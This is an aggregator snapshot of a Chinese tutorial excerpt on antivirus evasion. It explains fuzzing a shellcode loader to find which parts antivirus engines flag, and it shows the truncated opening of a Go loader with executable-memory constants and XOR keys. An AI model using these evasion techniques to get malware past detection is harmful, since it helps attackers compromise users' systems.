注册    登录
今天看啥  ›  专栏  ›  渗透Xiao白帽

免杀基础教学(下卷)

渗透Xiao白帽  · 公众号  ·  · 2021-11-30 10:01
文章首发于火线Zone社区(https://zone.huoxian.cn/)通过,免杀基础教学(上卷)相信大家已经对免杀有了基本的了解,下卷我们继续讲Fuzz Loader源码。0x05 Fuzz Loader源码如何Fuzz 出loader被查杀的点,在写免杀时尤为重要,因为你不知道问题出在哪里,就没办法解决问题。在fuzz时,要注意我们的木马是静态被杀还是运行时被杀,这有助于我们更快的锁定查杀点。下面讲一下如何通过loader源码定位杀软查杀的点:静态被杀举下面这一个分离免杀 loader的例子:loader.gopackage mainimport (  "encoding/base64"  "io/ioutil"  "log"  "net/http"  "os"  "syscall"  "unsafe")const (  MEM_COMMIT             = 0x1000  MEM_RESERVE            = 0x2000  PAGE_EXECUTE_READWRITE = 0x40  KEY_1                  = 58  KEY_2           ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
推荐文章
英国报姐  ·  美知名大学毕业礼变真人格斗场?上千家长与保安扭打比武,网友:比丧尸片都炸裂!
3 天前
中国教育报  ·  你每天都吃早餐吗?孩子早餐吃得怎么样?不吃早餐危害太大了,千万要注意!
3 天前
英伦圈  ·  伦敦工艺周"和韵华夏"展璀璨开幕,查尔斯国王贺信点赞工艺周创办十周年
3 天前
认真想  ·  贝叶斯思维训练营:理性思考者最重要的技能和习惯
3 天前
老俞闲话  ·  老俞闲话|西藏自驾之旅(第十六天)
5 天前
21世纪经济报道  ·  郑永年:中国的复兴必须重视海洋
12 月前
连州发布  ·  连州收听收看清远市党史学习教育动员会
3 年前
颜术医美  ·  医者TALK | 技术精湛的胡院长,传道授业的胡老师,用专业演绎双重精彩人生
3 年前
十方圆明心地涌  ·  首愚法师:金刚念诵,依七大现四加行 (上)
6 年前
关于   移动版   ·   Py中国   ·   RSS之家   ·   codingpro   ·   Code   ·   link之家   ·   卧龙AI搜索   ·   藏经阁   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号